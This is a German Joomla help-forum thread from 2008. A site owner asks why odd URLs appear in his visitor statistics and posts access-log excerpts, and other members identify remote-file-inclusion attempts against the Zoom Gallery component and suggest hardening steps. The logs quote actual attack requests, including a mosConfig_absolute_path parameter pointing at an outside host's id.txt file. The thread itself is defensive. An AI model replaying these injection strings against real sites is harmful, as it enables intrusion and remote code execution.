Waren hier Hacker am Werk?
Hallo zusammen!
Als ich eben über Joomlastats nachgesehen habe wer auf meine Seite zugegriffen hat, habe ich aus Joomlastats einige besuchte Seiten geöffnet. Sofort ist mir in der URL folgendes aufgefallen:
/index.php?option=com_zoom&Itemid=53&page=special&s orting=http%3A%2F%2Fxww.xxx.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2 Flaqipu%2F
Was soll das?
Ich bitte euch um Hilfe was könnte das sein?
In großer Sorge
rs20918
Geändert von rs20918 (08.02.2008 um 21:21 Uhr) Grund: Hacker URL entfernt!
Schaust du meine Signatur.
und hier
http://www.joomla-downloads.de/siche...a-gallery.html
ansonsten kann man mit den spärlichen Informationen nicht viel anfangen.
Hilfe gibt es unter Angabe von: Hoster, Joomla Version, Installierte Komponenten, PHPInfo, Problembeschreibung
Joomla 1.5 Anleitung - CHMOD Verzeichnisse 755 | Dateien 644 | 777 du wirst gehackt!
Info: Privat Support nur gegen Vorkasse
Hallo nochmals, danke für die Tipps. Habe gesehen das einige Dateien sowie Ordner 777 bzw. 755 hatten.
Was hat das aber zu bedeuten, wenn in dieser URL dann ein "www.thoseguysfilms.com" integiert ist? Bzw. kann man das irgendwie bereinigen oder entferen?
Jetzt noch eine rein theoretische Frage:/index.php?option=com_zoom&Itemid=53&page=special&s orting=http%3A%2F%2Fwww.xxx-url_geaendert-xxx.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages% 2Fuza%2 Flaqipu%2F
Ich weis ja jetzt, das die Zoom Gallery sehr unsicher ist. Was wär aber, wenn ich alle Dateien - auch Admindateien - die die Zoom benötigt auf 444 setzte und die Ornder auf 755 (sind schon auf 755). Könnte man die Zoom so sicher machen um weiteren Schaden zu verhindern?
Mfg
rs20918
Nein.Ich weis ja jetzt, das die Zoom Gallery sehr unsicher ist. Was wär aber, wenn ich alle Dateien - auch Admindateien - die die Zoom benötigt auf 444 setzte und die Ornder auf 755 (sind schon auf 755). Könnte man die Zoom so sicher machen um weiteren Schaden zu verhindern?
Zoom kann man sicher betreiben indem man die passenden Dateien von Hand patcht. Link dazu gabs hier im Forum irgendwo, ob dieser Patch mitlerweile auch in die offizielle Version eigeflossen ist weiß ich nicht.
Zusätzlich dann noch register_globals + emulation und allow_url_fopen = OFF.
Dazu noch die .htaccess aktivieren und Du bist erst mal auf der sicheren Seite.
Ich würde mir überlegen auf eine andere Gallerie auszuweichen, den bei zoom tut sich seit langem überhaupt nichts mehr.
Hast Du ne Empfehlung?Zitat von chw
Schau Dir mal die PonyML an, oder eine der "großen" - "externen" Galerien über eine Bridge einbinden.
Hallo chw!
Danke für die schnelle Antwort.
Also die register_globals waren OFF und die .htaccess habe ich aktiviert.
Das mit derhabe ich noch nicht verstanden bzw. gefunden. Kannst du mir da nochmals helfen?+ emulation und allow_url_fopen = OFF
Die Zoom möchte ich eigentlich nicht mehr missen. Ich finde sie einfach die Beste und ich habe von der Anwendung her absolut keine Probleme damit. Den ganzen Schnick-Schnak wir z.B:
- das EXIF-Ding
- keine E-Cards
- keine Lightbox
- kein Zoom (die Bildvergrößerung), usw.
brauche ich nicht.
Das muss ich mir erst duchen, den "von Hand patchen" sagt mir nichts, da ich über den Status eines "Jommla Newbie" noch lange nicht hinaus bin.Zoom kann man sicher betreiben indem man die passenden Dateien von Hand patcht. Link dazu gabs hier im Forum irgendwo, ob dieser Patch mitlerweile auch in die offizielle Version eigeflossen ist weiß ich nicht.
Danke chw
Kann mir bitte jeman erklären was hier passiert ist?
In JoomlaStats unter den Besuchten Seiten wird dieser Link angezeigt (das ist einer von vielen):
index.php?option=com_zoom&Itemid=53&page=view&cati d=10&PageNo=http%3A%2F%2Fwww.xxx-url_geaendert-xxx.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F&key=118&hit=1
Ich bin hier etwas überfordert!
Was muss ich hier beachten?
Wo finde ich die Lücke?
Ich würde euch um Tipps bitten?
Danke
rs20918
Die Frage verstehe ich nun nicht ganz, steht doch da:
Aus deiser Zeile alleine Rückschlüsse über eine Sicherheitslücke zu ziehen ist erstmal nicht möglich. Bitte zitiert doch die Orginalauszüge aus den Webserver logs und nicht immer dieses unvollständige jomStats geschreibsel.
Fakt ist aber das Versucht wurde über eine (möglicherweise) existierende Lücke in Zoom fremden Code einzuschleußen und auszuführen. Der Code liegt auf einem Server mit der tld .it Ob erfolgreich oder nicht lässt sich so nicht sagen.
Das mit dem von "Hand Patchen": Die Entwicklung von zoom stockt etwas. Daher gab es letztes Jahr eine Lücke (nach oben genannten Muster) für die nie ein offizieller Patch auf der zoom Seite verfügbar war.
Daher hatten einige Personen die diese Gallerie nutzen die Dateien selber geflickt und das Ergebniss, bzw. die Anleitung dazu freundlicherweise hier veröffentlicht. Musst Du mal suchen, das übelass ich Dir.
Ob diese Lücke in der aktuellen Version immer noch vorhanden ist weiß ich nicht, könnte man aber leicht herausfinden.
Hallo nochmals!
Hab jetzt die jog-files:
Das ist nur ein kleiner Auszug.Code:69.88.47.161 - - [05/Feb/2008:03:42:22 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 403 331 "-" "libwww-perl/5.805" 87.236.199.50 - - [05/Feb/2008:03:44:27 +0100] "GET / HTTP/1.0" 200 43483 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" 87.236.199.50 - - [05/Feb/2008:03:44:30 +0100] "GET /index.php?option=http%3A%2F%2Fwww.xxx.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F&Itemid=53&page=view&catid=11&PageNo=10&key=21&hit=1 HTTP/1.0" 404 29648 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" 87.236.199.50 - - [05/Feb/2008:03:44:39 +0100] "GET /&Itemid=http%3A%2F%2Fwww.xxx.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F&page=view&catid=11&PageNo=10&key=21&hit=1 HTTP/1.0" 200 56641 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" 87.236.199.50 - - [05/Feb/2008:03:44:51 +0100] "GET /&Itemid=53&page=view&catid=11&PageNo=10&key=21&hit=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F HTTP/1.0" 200 56670 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" 87.236.199.50 - - [05/Feb/2008:03:44:53 +0100] "GET /index.php?option=com_search&Itemid=http%3A%2F%2Fwww.xxx.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F HTTP/1.0" 200 30936 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" 87.236.199.50 - - [05/Feb/2008:03:44:58 +0100] "GET /&Itemid=53&page=special&sorting=http%3A%2F%2Fwww.xxx.com%2Fsoeasy******%2Fixu%2Fxotem%2F HTTP/1.0" 200 34599 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" 87.236.199.50 - - [05/Feb/2008:03:45:25 +0100] "GET /index2.php?option=com_jomcomment&no_html=http%3A%2F%2Fwww.xxx.ro%2Fupload_fisiere%2Fagihixu%2Fbezodan%2F&jc_task=rss&contentid=105 HTTP/1.0" 200 633 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" 87.236.199.50 - - [05/Feb/2008:03:46:18 +0100] "GET /index.php?option=com_content&task=view&id=http%3A%2F%2Fwww.xxx.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F&Itemid=2 HTTP/1.0" 200 28108 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" 62.168.116.72 - - [05/Feb/2008:04:51:25 +0100] "GET /index.php?option=com_zoom&Itemid=http%3A%2F%2Fwww.xxx.co****%2Fforum%2Flovuqo%2Fzil%2F&catid=28 HTTP/1.0" 200 38263 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
Könnte mir jemand das auswerten?
Vielen Dank!
rs20918
Geändert von rs20918 (06.02.2008 um 12:13 Uhr) Grund: Habe die Einträge im Code, der URL durch xxx verändert
Berechtigungen
LinkBack URL
About LinkBacks
Zitieren
Lesezeichen